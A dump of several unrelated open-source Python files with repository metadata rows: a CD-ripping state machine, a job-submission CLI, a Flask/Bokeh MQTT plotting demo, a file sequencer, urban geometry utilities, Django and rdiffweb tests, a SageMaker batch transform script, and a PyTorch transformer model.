        album_path = Path(MUSIC_PATH_NAME)
        if 'artist' in disc_meta:
            album_path = album_path.joinpath(
                self._remove_unsafe_chars(
                    ALBUM_FOLDER_NAME_TEMPLATE.format(
                        artist=disc_meta['artist'],
                        title=disc_meta['title']
                    )
                )
            )
        else:
            album_path = album_path.joinpath(
                self._remove_unsafe_chars(
                    VA_ALBUM_FOLDER_NAME_TEMPLATE.format(title=disc_meta['title'])
                )
            )
        if disc_meta['total_cds'] > 1:
            album_path = album_path.joinpath('CD%s' % disc_meta['cd'])
        return album_path
    def _remove_unsafe_chars(self, path_name):
        # Replace path-separator/drive characters so metadata cannot escape
        # or break the destination path.
        return path_name.replace('\\', ' ')\
            .replace('/', ' ')\
            .replace(':', ' ')
    def has_next_track(self):
        """True while tracks remain (transition condition for RIP_TRACK)."""
        return self.current_track < len(self.disc_meta['tracks'])
    def rip_next_track(self):
        """Grab, tag and move the next track, then advance the counter."""
        track_number = self.current_track + 1
        logger.info('Ripping track %s', track_number)
        tmp_file_path = Path(self.grab_and_convert_track_func(track_number))
        self.tag_track(track_number, str(tmp_file_path))
        target_path = self.folder_path.joinpath(
            self._get_track_filename(track_number)
        )
        self.move_track_func(tmp_file_path, target_path)
        self.track_list.append(str(target_path))
        self.current_track = track_number
        self.after_state_change_callback()
    def tag_track(self, track_number, track_filename):
        """Write artist/title/album/track-number tags for one track file."""
        track_meta = self.disc_meta['tracks'][track_number - 1]
        self.write_meta_func(
            track_filename,
            track_meta['artist'],
            track_meta['title'],
            self.disc_meta['title'],
            track_number,
            len(self.disc_meta['tracks'])
        )
    def _get_track_filename(self, track_number):
        # Zero-padded track number keeps files sorted; names are sanitised.
        track_meta = self.disc_meta['tracks'][track_number - 1]
        track_filename = TRACK_FILE_NAME_TEMPLATE.format(
            track_number="{:02d}".format(track_number),
            artist=track_meta['artist'],
            title=track_meta['title']
        )
        return self._remove_unsafe_chars(track_filename)
    def store_disc_id(self):
        """Persist the disc id marker file in the album folder (FINISH hook)."""
        disc_id = self.disc_meta['disc_id']
        path = self.folder_path.joinpath('.disc_id')
        self.write_disc_id_func(path, disc_id)
    def get_full_state(self):
        """Snapshot of the machine state and rip progress for observers."""
        return {
            'state': self.state.value,
            'track_list': self.track_list,
            'disc_meta': self.disc_meta,
            'current_track': self.current_track,
            'folder_path': str(self.folder_path)
        }
    def on_state_change(self, *args, **kwargs):
        # Forward every state change to the injected callback.
        self.after_state_change_callback()
def create_ripper(
    grab_and_convert_track_func,
    create_folder_func,
    write_meta_func,
    move_track_func,
    write_disc_id_func,
    after_state_change_callback
):
    """Build a Ripper and wire its state machine.

    Transitions: NO_DISC -> KNOWN_DISC (already ripped), NO_DISC -> RIPPING
    (start, creating metadata/folder), RIPPING self-loop per track while
    tracks remain, RIPPING -> DONE when exhausted (storing the disc id),
    and EJECT from any state back to NO_DISC.
    """
    ripper = Ripper(
        grab_and_convert_track_func,
        create_folder_func,
        write_meta_func,
        move_track_func,
        write_disc_id_func,
        after_state_change_callback
    )
    machine = Machine(ripper, states=States, initial=States.NO_DISC, after_state_change='on_state_change')
    # terminal state: disc already ripped
    machine.add_transition(Triggers.KNOWN_DISC, States.NO_DISC, States.KNOWN_DISC)
    machine.add_transition(
        Triggers.START,
        States.NO_DISC,
        States.RIPPING,
        before=['set_disc_meta', 'create_folder']
    )
    machine.add_transition(
        Triggers.RIP_TRACK,
        States.RIPPING,
        States.RIPPING,
        conditions='has_next_track',
        before='rip_next_track'
    )
    # terminal state: disc ripped successfully
    machine.add_transition(
        Triggers.FINISH,
        States.RIPPING,
        States.DONE,
        unless='has_next_track',
        before='store_disc_id'
    )
    machine.add_transition(Triggers.EJECT, '*', States.NO_DISC, before='_clear_internal_state')
    return ripper
| pisarenko-net/cdp-sa | hifi_appliance/state/ripper.py | ripper.py | py | 5,818 | python | en | code | 0 | github-code | 36 |
74226159463 | import argparse
import utils
# CLI definition; note args are parsed at import time, so importing this
# module from another script will consume sys.argv.
parser = argparse.ArgumentParser(description="User need to submit job informations")
parser.add_argument('--min', type=int, required=True, help='min num of nodes')
parser.add_argument('--max', type=int, required=True, help="max num of nodes")
parser.add_argument('--N', type=int, required=True, nargs='+', help='num of nodes for scaling')
parser.add_argument('--O', type=float, required=True, nargs='+', help='objective ratio rate')
parser.add_argument('--res_up', type=int, required=True, help="scale up overhead")
parser.add_argument('--res_dw', type=int, required=True, help="scale down overhead")
parser.add_argument('--path', required=True, help="execute script path")
args = parser.parse_args()
def main():
    """Submit a job described by the parsed CLI arguments and print its GUID."""
    job_id = utils.submit_job(min=args.min, max=args.max, N=args.N,
                              O=args.O, res_up=args.res_up,
                              res_dw=args.res_dw, path=args.path)
    print("Job submitted! GUID:", str(job_id))
'''
# previous job submit
id = m.submit_job(min=1, max=5, Ns=[1, 2, 3, 4, 5],
Os=[1, 1.8, 2.6, 3.4, 4.2], res_up=3, res_dw=1, path="train.py")
'''
# Script entry point.
if __name__ == "__main__":
    main()
| BFTrainer/BFTrainer | BFSub.py | BFSub.py | py | 1,166 | python | en | code | 3 | github-code | 36 |
6939797470 | from threading import Thread
from flask import Flask, render_template
from tornado.ioloop import IOLoop
from bokeh.embed import server_document
from bokeh.layouts import column
from bokeh.plotting import figure
from bokeh.server.server import Server
from bokeh.themes import Theme
import numpy as np
from bokeh.models import ColumnDataSource
import paho.mqtt.client as mqtt
app = Flask(__name__)
def bkapp(doc):
    """Bokeh application: stream (timestamp, power) samples from MQTT into a
    live line plot.

    Each session opens its own MQTT client subscribed to topic ``plug/0``;
    messages are buffered by the paho callback thread and flushed into the
    plot's ColumnDataSource by a 100 ms periodic callback on the Bokeh
    document.  NOTE(review): assumes the broker runs on localhost and the
    payload is b"<ts>,<power>" — confirm against the publisher.
    """
    pwr_queue = []
    ts_queue = []
    def on_message(client, userdata, message):
        # Runs on the paho network thread; only buffer here.
        ts, pwr = map(float, message.payload.split(b','))
        ts_queue.append(ts)
        pwr_queue.append(pwr)
    cds = ColumnDataSource(data={'x': [], 'y': []})
    def callback():
        nonlocal ts_queue, pwr_queue
        # append any new data to the graph
        cds.stream({'x': ts_queue, 'y': pwr_queue})
        # then clear the queues
        pwr_queue.clear()
        ts_queue.clear()
    p = figure(sizing_mode='stretch_width', title='MQTT streaming example')
    # Random RGB line colour per session.
    random255 = lambda: np.random.randint(255)
    color = tuple(random255() for _ in range(3))
    p.line('x', 'y', source=cds, color=color)
    doc.add_root(column(p))
    # init client
    client = mqtt.Client("stream")
    client.connect("localhost")
    client.subscribe("plug/0")
    client.on_message=on_message
    # loop
    client.loop_start() # Runs a loop in a background thread
    doc.add_periodic_callback(callback, 100)
@app.route('/', methods=['GET'])
def bkapp_page():
    """Render the landing page with the embedded Bokeh app script tag."""
    embed_script = server_document('http://127.0.0.1:5006/bkapp')
    return render_template("mqtt.html", script=embed_script, template="Flask")
def bk_worker():
    """Run the Bokeh server for /bkapp on its own IOLoop (blocking).

    Intended to run on a background thread; websocket connections are only
    accepted from the Flask origin 127.0.0.1:8000.
    """
    # Can't pass num_procs > 1 in this configuration.
    server = Server({'/bkapp': bkapp},
                    io_loop=IOLoop(),
                    allow_websocket_origin=["127.0.0.1:8000"])
    server.start()
    server.io_loop.start()
# Started at module import so the Bokeh server is up before Flask serves
# the embedding page, regardless of how the Flask app is launched.
Thread(target=bk_worker).start()
if __name__ == '__main__':
    app.run(port=8000)
| marnatgon/Senior-Design | software/example/flask/mqtt.py | mqtt.py | py | 1,891 | python | en | code | 0 | github-code | 36 |
22985216912 | from collections import deque
from threading import Thread
class Sequencer:
    """Writes data chunks to a file at offsets derived from their index.

    Chunks are queued with :meth:`add` and written by a background thread so
    producers never block on disk I/O.  NOTE(review): the seek offset is
    ``index * len(data)``, which is only correct when every chunk has the
    same size — confirm with the producer protocol.
    """
    def __init__(self, name):
        self.name = name
        self.file = open(name, "wb")
        self.queue = deque()
        # Fix: the original never started the writer thread, so close()
        # raised "cannot join thread before it is started" and nothing was
        # ever written.  `running` is set before start() to avoid a race
        # with an immediate close().
        self.running = True
        self.byte_sequence = []
        self.thread = Thread(target=self._writer_thread)
        self.thread.start()
    def add(self, byte):
        """Queue one chunk ({'index': int, 'data': bytes}) for writing."""
        self.queue.append(byte)
    def close(self):
        """
        Stop the writer thread (after it drains the queue) and close the file.
        """
        self.running = False
        self.thread.join()
        self.file.close()
    def _writer_thread(self):
        """
        Runs until a stop is requested and the queue is exhausted.
        """
        import time
        while self.running or len(self.queue):
            if len(self.queue):
                byte = self.queue.popleft()
                chunk = byte['index']
                data = byte['data']
                chunk_size = len(data)
                self.file.seek(chunk*chunk_size)
                self.file.write(data)
            else:
                # Fix: avoid a hot busy-wait while the queue is empty.
                time.sleep(0.001)
    def arrange(self):
        # Legacy in-memory coalescing path; byte_sequence is no longer fed
        # by add(), so this is effectively dead code kept for compatibility.
        self.byte_sequence.sort(key=lambda x: x['index'])
        i = 0
        while i != len(self.byte_sequence):
            current = self.byte_sequence[i]
            previous = self.byte_sequence[i - 1]
            current_sequence = current.get('index')
            previous_sequence = previous.get('last', previous.get('index'))
            if (current_sequence - 1) == previous_sequence and (current_sequence - 1) > -1:
                current = self.byte_sequence.pop(i)
                previous['data'] = previous['data'] + current.get('data', b'')
                last_sequence = current.get('last', current.get('index'))
                previous['last'] = last_sequence
                continue
            i += 1
        print(self.byte_sequence)
if __name__ == '__main__':
    # Smoke test: queue twelve small chunks on a sequencer writing to 'test'.
    obj = Sequencer('test')
    for index in range(12):
        obj.add({'index': index, 'data': str(index).encode()})
| muthuprabhu-kp/FTOU | Server/ByteSequencer.py | ByteSequencer.py | py | 2,482 | python | en | code | 0 | github-code | 36 |
27551532420 | import rdiffweb.test
from rdiffweb.core.model import RepoObject, UserObject
class SettingsTest(rdiffweb.test.WebCase):
    """Functional tests for the per-repository settings page."""

    # Authenticate the default test user before each request.
    login = True

    def test_page(self):
        """Settings page renders for the repository owner."""
        self.getPage("/settings/" + self.USERNAME + "/" + self.REPO)
        self.assertInBody("General Settings")
        self.assertStatus(200)

    def test_page_encoding_none(self):
        """Page still renders when the repo has no encoding defined."""
        # Given a repo where encoding is not defined.
        RepoObject.query.update({RepoObject.encoding: None})
        repo = RepoObject.query.first()
        repo.commit()
        # When browsing settings pages
        self.getPage("/settings/" + self.USERNAME + "/" + self.REPO)
        # Then not error is report.
        self.assertStatus(200)

    def test_as_another_user(self):
        """Admins may view other users' repo settings; plain users may not."""
        # Create a nother user with admin right
        user_obj = UserObject.add_user('anotheruser', 'password')
        user_obj.user_root = self.testcases
        user_obj.refresh_repos()
        user_obj.commit()
        self.getPage("/settings/anotheruser/testcases")
        self.assertInBody("General Settings")
        self.assertStatus('200 OK')
        # Remove admin right
        admin = UserObject.get_user('admin')
        admin.role = UserObject.USER_ROLE
        admin.commit()
        # Browse admin's repos
        self.getPage("/settings/anotheruser/testcases")
        self.assertStatus('403 Forbidden')

    def test_set_maxage(self):
        """POSTing maxage updates the repo and shows a success message."""
        # When updating maxage
        self.getPage("/settings/" + self.USERNAME + "/" + self.REPO + "/", method="POST", body={'maxage': '4'})
        self.assertStatus(303)
        # Then a succes message is displayed to user
        self.getPage("/settings/" + self.USERNAME + "/" + self.REPO + "/")
        self.assertStatus(200)
        self.assertInBody("Settings modified successfully.")
        # Then repo get updated
        repo_obj = RepoObject.query.filter(RepoObject.repopath == self.REPO).first()
        self.assertEqual(4, repo_obj.maxage)

    def test_set_maxage_method_get(self):
        """GET with a maxage query string must not modify the database."""
        # When trying to update maxage with GET method
        self.getPage("/settings/" + self.USERNAME + "/" + self.REPO + "/?maxage=4")
        # Then page return without error
        self.assertStatus(200)
        # Then database is not updated
        repo_obj = RepoObject.query.filter(RepoObject.repopath == self.REPO).first()
        self.assertEqual(0, repo_obj.maxage)

    def test_does_not_exists(self):
        """Unknown repositories return 404."""
        # Given an invalid repo
        repo = 'invalid'
        # When trying to get settings from it
        self.getPage("/settings/" + self.USERNAME + "/" + repo)
        # Then a 404 error is return
        self.assertStatus(404)

    def test_browser_with_failed_repo(self):
        """A damaged/missing repo renders the page with an error banner."""
        # Given a failed repo
        admin = UserObject.get_user('admin')
        admin.user_root = '/invalid/'
        admin.commit()
        # When querying the logs
        self.getPage("/settings/" + self.USERNAME + "/" + self.REPO)
        # Then the page is return with an error message
        self.assertStatus(200)
        self.assertInBody('The repository cannot be found or is badly damaged.')
| ikus060/rdiffweb | rdiffweb/controller/tests/test_page_settings.py | test_page_settings.py | py | 3,100 | python | en | code | 114 | github-code | 36 |
28786462902 | import pandas as pd
import geopandas as gpd
import osmnx as ox
from h3 import h3
from rich.progress import track
from urbanpy.utils import geo_boundary_to_polygon
from typing import Sequence, Union
# Public API exported via `from <module> import *`.
# NOTE(review): resolution_downsampling and osmnx_coefficient_computation are
# presumably defined further down this module (outside the visible chunk).
__all__ = [
    "merge_geom_downloads",
    "filter_population",
    "remove_features",
    "gen_hexagons",
    "merge_shape_hex",
    "overlay_polygons_hexs",
    "resolution_downsampling",
    "osmnx_coefficient_computation",
]
def merge_geom_downloads(
    gdfs: Sequence[gpd.GeoDataFrame], crs: str = "EPSG:4326"
) -> gpd.GeoDataFrame:
    """Merge several GeoDataFrames from OSM download_osm into one geometry.

    Parameters
    ----------
    gdfs: array_like
        GeoDataFrames to merge; all are assumed to share the same CRS.
    crs: str
        Valid CRS string for the resulting GeoDataFrame.

    Returns
    -------
    GeoDataFrame
        Single-row frame whose geometry is the unary union of all inputs,
        giving one boundary for the whole city.

    Examples
    --------
    >>> lima = urbanpy.download.nominatim_osm("Lima, Peru", 2)
    >>> callao = urbanpy.download.nominatim_osm("Callao, Peru", 1)
    >>> urbanpy.geom.merge_geom_downloads([lima, callao]).head()
    geometry
    MULTIPOLYGON (((-76.80277 -12.47562, -76.80261...)))
    """
    union_geom = pd.concat(gdfs).unary_union
    return gpd.GeoDataFrame(geometry=[union_geom], crs=crs)
def filter_population(
    pop_df: pd.DataFrame, polygon_gdf: gpd.GeoDataFrame
) -> gpd.GeoDataFrame:
    """Clip an HDX population table to the bounding box of *polygon_gdf*.

    Parameters
    ----------
    pop_df: DataFrame
        Population table with ``latitude``/``longitude`` columns
        (output of ``download_hdx``).
    polygon_gdf: GeoDataFrame
        Boundary polygons (output of ``download_osm`` or
        ``merge_geom_downloads``).

    Returns
    -------
    GeoDataFrame
        Rows of *pop_df* inside the polygon's total bounds, with a point
        geometry column in EPSG:4326.

    Examples
    --------
    >>> pop = urbanpy.download.hdx_fb_population('peru', 'full')
    >>> urbanpy.geom.filter_population(pop, lima).head(1)
    latitude | longitude | population_2015 | population_2020 | geometry
    -12.519861 | -76.774583 | 2.633668 | 2.644757 | POINT (-76.77458 -12.51986)
    """
    minx, miny, maxx, maxy = polygon_gdf.geometry.total_bounds
    in_bounds = (
        pop_df["longitude"].between(minx, maxx)
        & pop_df["latitude"].between(miny, maxy)
    )
    subset = pop_df[in_bounds]
    point_geoms = gpd.points_from_xy(subset["longitude"], subset["latitude"])
    return gpd.GeoDataFrame(subset, geometry=point_geoms, crs="EPSG:4326")
def remove_features(gdf: gpd.GeoDataFrame, bounds: Sequence[float]) -> gpd.GeoDataFrame:
    """Drop every feature of *gdf* that falls inside the given bounds.

    Parameters
    ----------
    gdf: GeoDataFrame
        Point features (e.g. output of ``filter_population``).
    bounds: array_like
        [minx, miny, maxx, maxy] window to remove (GeoPandas
        ``total_bounds`` format).

    Returns
    -------
    GeoDataFrame
        *gdf* without the features intersecting the window.

    Examples
    --------
    >>> removed = urbanpy.geom.remove_features(lima, [-12.2, -12, -77.2, -77.17])  # drop San Lorenzo Island
    >>> print(lima.shape, removed.shape)
    (348434, 4) (348427, 4)
    """
    minx, miny, maxx, maxy = bounds
    inside_index = gdf.cx[minx:maxx, miny:maxy].index
    return gdf.drop(inside_index)
def gen_hexagons(resolution: int, city: gpd.GeoDataFrame) -> gpd.GeoDataFrame:
    """Cover an input multipolygon layer with H3 hexagons at *resolution*.

    Parameters
    ----------
    resolution: int, 0:15
        H3 resolution; larger values yield smaller hexagons.
    city: GeoDataFrame
        City polygons to tessellate.

    Returns
    -------
    GeoDataFrame
        One row per hexagon with columns ``hex`` (H3 id) and ``geometry``,
        in EPSG:4326, duplicates removed.

    Examples
    --------
    >>> urbanpy.geom.gen_hexagons(8, lima).head(1)
    hex | geometry
    888e620e41fffff | POLYGON ((-76.80007 -12.46917, -76.80439 -12.4...))
    """
    hex_ids = []
    hex_polys = []
    # Polyfill each polygon of the (possibly multi-part) city boundary.
    exploded = city.explode(index_parts=True).reset_index(drop=True)
    for _, row in exploded.iterrows():
        filled = h3.polyfill(
            row["geometry"].__geo_interface__, res=resolution, geo_json_conformant=True
        )
        for hex_id in filled:
            hex_ids.append(hex_id)
            hex_polys.append(geo_boundary_to_polygon(hex_id))
    result = gpd.GeoDataFrame(hex_ids, geometry=hex_polys).drop_duplicates()
    result.crs = "EPSG:4326"
    # Rename the default integer column for readability.
    return result.rename(columns={0: "hex"})
def merge_shape_hex(
    hexs: gpd.GeoDataFrame,
    shape: gpd.GeoDataFrame,
    agg: dict,
    how="inner",
    predicate="intersects",
) -> gpd.GeoDataFrame:
    """Spatially join point features onto hexagons and aggregate per hexagon.

    Parameters
    ----------
    hexs: GeoDataFrame
        Hexagon geometries.
    shape: GeoDataFrame
        Point features carrying the columns to aggregate.
    agg: dict
        Column name -> aggregation ('sum', 'min', 'max', ...).
    how: str, one of {'inner', 'left', 'right'}, default 'inner'
        Join strategy passed to ``gpd.sjoin``.
    predicate: str, one of {'intersects', 'contains', 'within'}, default 'intersects'
        Spatial predicate used for the join.

    Returns
    -------
    GeoDataFrame
        Copy of *hexs* with one aggregated column per key of *agg*;
        hexagons without matches keep NaN.

    Examples
    --------
    >>> urbanpy.geom.merge_point_hex(hexs, pop_df, 'inner', 'within', {'population_2020': 'sum'}).head(1)
    0 | geometry | population_2020
    888e628d8bfffff | POLYGON ((-76.66002 -12.20371, -76.66433 -12.2... | NaN
    """
    joined = gpd.sjoin(shape, hexs, how=how, predicate=predicate)
    # index_right is the hexagon index contributed by the join.
    aggregated = joined.groupby("index_right").agg(agg)
    # Work on a copy to avoid a pandas SpecificationError on the original.
    result = hexs.copy()
    for column in agg:
        result.loc[aggregated.index, column] = aggregated[column].values
    return result
def overlay_polygons_hexs(
    polygons: gpd.GeoDataFrame,
    hexs: gpd.GeoDataFrame,
    hex_col: str,
    columns: Sequence[str],
) -> gpd.GeoDataFrame:
    """
    Overlay a polygon GeoDataFrame with an H3 hexagon GeoDataFrame and split
    the values in ``columns`` proportionally to the overlapped area.

    Parameters
    ----------
    polygons: GeoDataFrame
        Input GeoDataFrame containing polygons and the columns to be processed
    hexs: GeoDataFrame
        Input GeoDataFrame containing the desired output hexagon geometries
    hex_col: str
        Name of the column holding the hex id.
    columns: list
        Column names whose values are adjusted proportionally to the overlap
        area of each polygon/hexagon intersection.

    Returns
    -------
    hexs: GeoDataFrame
        One row per hexagon id, with each of ``columns`` summed over the
        area-weighted polygon fragments falling inside that hexagon.
    """
    # Work on a copy so the caller's frame keeps its original columns.
    source = polygons.copy()
    source["poly_area"] = source.geometry.area

    # Intersect polygons with hexagons; each row becomes one fragment.
    pieces = gpd.overlay(source, hexs, how="intersection")

    # Weight every fragment by the share of its parent polygon it covers.
    fraction = pieces.geometry.area / pieces["poly_area"]
    pieces[columns] = pieces[columns].multiply(fraction, axis=0)

    # Sum the weighted values per hexagon id.
    per_hexagon_data = pieces.groupby(hex_col)[columns].sum()

    # Re-attach hexagon geometry and return a proper GeoDataFrame.
    merged = pd.merge(
        left=per_hexagon_data, right=hexs[[hex_col, "geometry"]], on=hex_col
    )
    return gpd.GeoDataFrame(
        merged[[hex_col] + columns], geometry=merged["geometry"], crs=hexs.crs
    )
def resolution_downsampling(
    gdf: gpd.GeoDataFrame, hex_col: str, coarse_resolution: int, agg: dict
) -> gpd.GeoDataFrame:
    """
    Downsample hexagon resolution aggregating indicated metrics (e.g. Transform hexagon resolution from 9 to 6).

    Parameters
    ----------
    gdf: GeoDataFrame
        GeoDataFrame with hexagon geometries (output from gen_hexagons).
    hex_col: str
        Determines the column with the hex id.
    coarse_resolution: int, 0:15
        Hexagon resolution lower than gdf actual resolution (higher values create smaller hexagons).
    agg: dict
        Mapping of column name -> aggregation operation (any form accepted by
        pandas ``DataFrame.agg``) applied when collapsing child hexagons into
        their coarser parent.

    Returns
    -------
    gdfc: GeoDataFrame
        GeoDataFrame with lower resolution hexagons geometry and metrics aggregated as indicated.
    """
    gdf_coarse = gdf.copy()  # keep the caller's frame untouched
    coarse_hex_col = "hex_{}".format(coarse_resolution)
    # Map each fine hexagon id to its parent id at the coarser resolution.
    gdf_coarse[coarse_hex_col] = gdf_coarse[hex_col].apply(
        lambda x: h3.h3_to_parent(x, coarse_resolution)
    )
    # Collapse all children of the same parent into one row per `agg`.
    dfc = gdf_coarse.groupby([coarse_hex_col]).agg(agg).reset_index()
    # Rebuild polygon geometry from the parent hex ids.
    gdfc_geometry = dfc[coarse_hex_col].apply(geo_boundary_to_polygon)
    return gpd.GeoDataFrame(dfc, geometry=gdfc_geometry, crs=gdf.crs)
def osmnx_coefficient_computation(
    gdf,
    net_type,
    basic_stats,
    extended_stats,
    connectivity=False,
    anc=False,
    ecc=False,
    bc=False,
    cc=False,
):
    """
    Apply osmnx's graph from polygon to query a city's street network within a geometry.
    This may be a long procedure given the hexagon layer resolution.

    Parameters
    ----------
    gdf: GeoDataFrame
        GeoDataFrame with geometries to download graphs contained within them.
    net_type: str
        Network type to download. One of {'drive', 'drive_service', 'walk', 'bike', 'all', 'all_private'}
    basic_stats: list
        List of basic stats to compute from downloaded graph
    extended_stats: list
        List of extended stats to compute from graph
    connectivity: bool. Default False.
        Compute node and edge connectivity
    anc: bool. Default False.
        Compute avg node connectivity
    ecc: bool. Default False.
        Compute shortest paths, eccentricity and topological metric
    bc: bool. Default False.
        Compute node betweeness centrality
    cc: bool. Default False.
        Compute node closeness centrality
    For more detail about these parameters, see https://osmnx.readthedocs.io/en/stable/osmnx.html#module-osmnx.stats

    Returns
    -------
    gdf: GeoDataFrame
        Input GeoDataFrame with updated columns containing the selected metrics
        (the input frame is mutated in place and also returned).

    Examples
    --------
    >>> hexagons = urbanpy.geom.gen_hexagons(8, lima)
    >>> urbanpy.geom.osmnx_coefficient_computation(hexagons.head(), 'walk', ['circuity_avg'], [])
    On record 1: There are no nodes within the requested geometry
    On record 3: There are no nodes within the requested geometry
    hex | geometry | circuity_avg
    888e62c64bfffff | POLYGON ((-76.89763 -12.03869, -76.90194 -12.0... | 1.021441
    888e6212e1fffff | POLYGON ((-76.75291 -12.19727, -76.75722 -12.2... | NaN
    888e62d333fffff | POLYGON ((-77.09253 -11.83762, -77.09685 -11.8... | 1.025313
    888e666c2dfffff | POLYGON ((-76.93109 -11.79031, -76.93540 -11.7... | NaN
    888e62d4b3fffff | POLYGON ((-76.87935 -12.03688, -76.88366 -12.0... | 1.044654
    """
    # NOTE(review): ox.extended_stats was removed in osmnx 1.0 -- verify the
    # pinned osmnx version still exposes it before relying on this function.
    # May be a lengthy download depending on the amount of features
    for index, row in track(
        gdf.iterrows(),
        total=gdf.shape[0],
        description="Computing road network coefficients...",
    ):
        try:
            graph = ox.graph_from_polygon(row["geometry"], net_type)
            b_stats = ox.basic_stats(graph)
            ext_stats = ox.extended_stats(graph, connectivity, anc, ecc, bc, cc)
            # Write each requested metric back onto the input frame in place;
            # .get() leaves NaN (via None) for stats the graph did not yield.
            for stat in basic_stats:
                gdf.loc[index, stat] = b_stats.get(stat)
            for stat in extended_stats:
                gdf.loc[index, stat] = ext_stats.get(stat)
        except Exception as err:
            # Geometries with no street nodes raise; report and keep going so
            # one empty hexagon does not abort the whole batch.
            print(f"On record {index}: ", err)
    return gdf
| EL-BID/urbanpy | urbanpy/geom/geom.py | geom.py | py | 15,013 | python | en | code | 85 | github-code | 36 |
35658675778 | """The emails tests module."""
import pytest
from tests.fixtures.auth import USER_EMAIL
from communication.notifications.email import mail_managers, mail_user
from users.models import User
pytestmark = pytest.mark.django_db
def test_mail_managers(mailoutbox):
    """Should send an email to the system managers."""
    mail_managers(subject="Text message", data={"text": "<p>Test text</p>"})

    assert len(mailoutbox) == 1
    sent = mailoutbox[0]
    expected_recipients = ["admin@example.com", "manager@example.com"]
    assert sent.recipients() == expected_recipients
    assert "Text message" in sent.subject
    html_body = sent.alternatives[0][0]
    assert "<p>Test text" in html_body
def test_mail_user(
    user: User,
    mailoutbox,
):
    """Should send an email to the user."""
    mail_user(
        user=user,
        subject="Text message",
        template="message_notification",
        data={},
    )

    assert len(mailoutbox) == 1
    sent = mailoutbox[0]
    assert sent.recipients() == [USER_EMAIL]
    assert "Text message" in sent.subject
| webmalc/d8base-backend | communication/tests/email_tests.py | email_tests.py | py | 1,000 | python | en | code | 0 | github-code | 36 |
31482133421 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import random
from datetime import datetime
from pathlib2 import Path
from common import _utils
def main(argv=None):
  """Run a SageMaker batch transform job from CLI arguments and wait for it.

  Writes the S3 output location to --output_location_file so downstream
  pipeline steps can consume it.
  """
  parser = argparse.ArgumentParser(description='SageMaker Batch Transformation Job')
  parser.add_argument('--region', type=str, help='The region where the cluster launches.')
  parser.add_argument('--model_name', type=str, help='The name of the model that you want to use for the transform job.')
  parser.add_argument('--input_location', type=str, help='The S3 location of the data source that is associated with a channel.')
  parser.add_argument('--output_location', type=str, help='The Amazon S3 path where you want Amazon SageMaker to store the results of the transform job.')
  parser.add_argument('--output_location_file', type=str, help='File path where the program will write the Amazon S3 URI of the transform job results.')
  args = parser.parse_args()

  logging.getLogger().setLevel(logging.INFO)
  client = _utils.get_client(args.region)
  logging.info('Submitting Batch Transformation request to SageMaker...')
  batch_job_name = _utils.create_transform_job(
      client, args.model_name, args.input_location, args.output_location)
  logging.info('Batch Job request submitted. Waiting for completion...')
  _utils.wait_for_transform_job(client, batch_job_name)
  _utils.print_tranformation_job_result(args.output_location)

  Path(args.output_location_file).parent.mkdir(parents=True, exist_ok=True)
  # u'{}'.format(...) yields text on both Python 2 and 3; the previous
  # unicode(...) call raises NameError under Python 3.
  Path(args.output_location_file).write_text(u'{}'.format(args.output_location))

  logging.info('Batch Transformation creation completed.')
# Script entry point: only run when executed directly, not on import.
if __name__ == "__main__":
  main()
| pamarquez/pipelineHW | components/aws/sagemaker/batch_transform/src/batch_transform.py | batch_transform.py | py | 2,183 | python | en | code | 0 | github-code | 36 |
34056654418 | import math
import torch
import torch.nn as nn
class PositionalEncoding(nn.Module):
    """Add sinusoidal positional encodings to a batch-first sequence.

    The callers in this file feed tensors shaped [batch, seq, d_model]
    (their nn.Transformer / nn.LSTM use batch_first=True), so the encoding
    table is stored as [1, max_len, d_model] and sliced along the *sequence*
    dimension.  The previous revision kept a seq-first table and sliced it
    with x.size(0), which added encodings indexed by batch position instead
    of token position.
    """

    def __init__(self, d_model, dropout=0.1, max_len=5000):
        super().__init__()
        self.dropout = nn.Dropout(p=dropout)

        position = torch.arange(max_len).unsqueeze(1)
        div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000.0) / d_model))
        pe = torch.zeros(1, max_len, d_model)
        pe[0, :, 0::2] = torch.sin(position * div_term)  # even dims: sine
        pe[0, :, 1::2] = torch.cos(position * div_term)  # odd dims: cosine
        # Buffer (not a Parameter): moves with .to()/.cuda(), no gradients.
        self.register_buffer("pe", pe)

    def forward(self, x):
        # x: [batch, seq, d_model]; the leading singleton dim broadcasts.
        x = x + self.pe[:, : x.size(1)]
        return self.dropout(x)
class TransformerNet(nn.Module):
    """Encoder-decoder Transformer over scalar time series.

    Inputs are [batch, seq] float tensors; each scalar is projected to
    d_model, positionally encoded, and fed to nn.Transformer
    (batch_first=True).
    """

    def __init__(
        self,
        d_model=512,
        nhead=8,
        num_encoder_layers=6,
        num_decoder_layers=6,
        dim_feedforward=2048,
        dropout=0.1,
        batch_size=512,
    ):
        super().__init__()
        self.l1 = nn.Linear(1, d_model)  # encoder input projection
        self.l2 = nn.Linear(1, d_model)  # decoder input projection
        self.positional_encoder = PositionalEncoding(d_model, max_len=batch_size)
        self.transformer = nn.Transformer(
            d_model,
            nhead,
            num_encoder_layers,
            num_decoder_layers,
            dim_feedforward,
            dropout,
            batch_first=True,
        )
        self.l3 = nn.Linear(d_model, 1)  # output projection back to scalars

    def forward(self, enc_x, dec_x):
        """Teacher-forced pass; returns [N, t_seq] predictions."""
        # Build the causal mask on the same device as the inputs; the
        # previous hard-coded .cuda() crashed on CPU-only machines.
        mask = nn.Transformer.generate_square_subsequent_mask(dec_x.shape[-1]).to(dec_x.device)

        enc_x = enc_x.unsqueeze(-1)  # [N, x_seq, 1]
        enc_x = self.l1(enc_x)  # [N, x_seq, d_model]
        enc_x = self.positional_encoder(enc_x)

        dec_x = dec_x.unsqueeze(-1)  # [N, t_seq, 1]
        dec_x = self.l2(dec_x)  # [N, t_seq, d_model]
        dec_x = self.positional_encoder(dec_x)

        y = self.transformer(enc_x, dec_x, tgt_mask=mask)  # [N, t_seq, d_model]
        y = self.l3(y).squeeze(-1)  # [N, t_seq]
        return y

    def test(self, enc_x, dec_x, t_seq):
        """Autoregressive rollout of t_seq steps seeded with dec_x[:, 0]."""
        dec_x = dec_x[:, [0]]  # [N, 1] seed token
        with torch.no_grad():
            encoder = self.transformer.encoder
